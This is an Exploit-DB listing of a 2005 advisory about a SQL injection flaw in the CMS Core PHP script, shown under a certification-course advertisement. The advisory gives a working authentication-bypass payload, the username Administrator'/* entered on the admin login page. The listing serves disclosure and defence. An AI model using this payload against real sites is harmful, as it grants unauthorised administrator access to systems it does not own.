CMScore - SQL Injection

EDB-ID:

808


Author:

GHC

Type:

webapps


Platform:

PHP

Date:

2005-02-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

/*==========================================*/
// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.

# milw0rm.com [2005-02-10]